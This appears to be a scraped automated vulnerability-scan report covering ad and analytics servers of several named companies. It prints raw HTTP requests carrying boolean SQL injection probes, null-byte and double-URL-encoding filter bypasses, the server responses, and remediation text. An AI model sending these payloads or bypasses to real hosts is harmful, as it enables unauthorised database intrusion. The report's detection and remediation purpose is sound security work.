GET /ad/sponsors/Procter_Gamble/Sep_2011'%20and%201%3d1--%20/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1 Host: adsatt.abc.starwave.com Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: N7ADWEB05 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 01:05:10 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /ad/sponsors/Procter_Gamble/Sep_2011'%20and%201%3d2--%20/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1 Host: adsatt.abc.starwave.com Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 From: n7adweb02 Content-Length: 1245 Date: Sat, 17 Sep 2011 01:05:10 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 00:55:26 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1402
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... </a> about the error.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc was not found on this server.</p> <hr> <address ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 19952419'%20or%201%3d1--%20 and 19952419'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 302 Moved Temporarily Content-Length: 163 Location: http://abc.go.com/error Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed05 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 17 Sep 2011 01:07:39 GMT Connection: close
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://abc.go.com/error ">http://abc.go.com/error </A>.<BODY></HTML>
The jsv parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the jsv parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the jsv request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914%2527&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT
Response 1
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 17 Sep 2011 00:56:45 GMT Server: cafe Cache-Control: private Content-Length: 5631 X-XSS-Protection: 1; mode=block
The slotname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the slotname parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409%00'&w=300&lmt=1316256959&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&dt=1316238959258&bpp=13&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504%2C7188170409&correlator=1316238953178&frm=4&adk=672172102&ga_vid=563675983.1316238953&ga_sid=1316238953&ga_hid=1468752110&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&adx=688&ady=2313&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fwww.tmz.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=309&xpc=KJhLYOB9rm&p=http%3A//www.tmz.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT
Response 1
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 17 Sep 2011 01:00:35 GMT Server: cafe Cache-Control: private Content-Length: 4567 X-XSS-Protection: 1; mode=block
The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F%00'&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT
Response 1
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 17 Sep 2011 00:55:20 GMT Server: cafe Cache-Control: private Content-Length: 5987 X-XSS-Protection: 1; mode=block
GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316256718&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2F%00''&dt=1316238718628&bpp=11&shv=r20110907&jsv=r20110914&correlator=1316238718686&frm=4&adk=3292020828&ga_vid=1160930501.1316238719&ga_sid=1316238719&ga_hid=1889546765&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=144&xpc=u82iW5Sevj&p=http%3A//www.toofab.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=OPT_OUT
Response 2
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 17 Sep 2011 00:55:21 GMT Server: cafe Cache-Control: private Content-Length: 3806 X-XSS-Protection: 1; mode=block
The C cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the C cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The WIDTH_RANGE parameter appears to be vulnerable to SQL injection attacks. The payloads 20440401'%20or%201%3d1--%20 and 20440401'%20or%201%3d2--%20 were each submitted in the WIDTH_RANGE parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The cat parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cat parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:20:06 GMT Server: Apache P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC" x-internal-server: 192.168.212.19 ny-ad9 Set-cookie: C=oNJ8X9wxYWVGdgaZa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:53:25 GMT; x-internal-browser: CH0 Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT; Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com x-internal-id: 174609135/1248373032/1137740046/4118631499 x-internal-selected: x-internal-error: NO VALID CATEGORY NAME Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript
...
1.16. http://q1.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://q1.checkm8.com
Path:
/adam/detect
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The C cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the C cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 80156717'%20or%201%3d1--%20 and 80156717'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://www.google.com/sorry/?con ...[SNIP]...
The ktextColor parameter appears to be vulnerable to SQL injection attacks. The payloads 21208523%20or%201%3d1--%20 and 21208523%20or%201%3d2--%20 were each submitted in the ktextColor parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Vary: Accept-Encoding P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Content-Type: text/html Date: Sat, 17 Sep 2011 01:22:06 GMT Content-Length: 1477 Connection: close Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:22:06 GMT; path=/
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ca request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The cwu parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cwu parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the cwu request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The cxy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cxy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The dw parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the dw parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the dw request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The epid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the epid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The esid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the esid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The pb_rtb_ev cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pb_rtb_ev cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the pb_rtb_ev cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The pxy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pxy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the pxy request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 01:16:10 GMT Server: Omniture DC/2.0.0 Content-Length: 410 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/wdgabccom,wdgasec was not found on this server. ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 01:26:47 GMT Server: Omniture DC/2.0.0 Content-Length: 434 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 was n ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 01:27:05 GMT Server: Omniture DC/2.0.0 Content-Length: 392 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The s parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the s parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
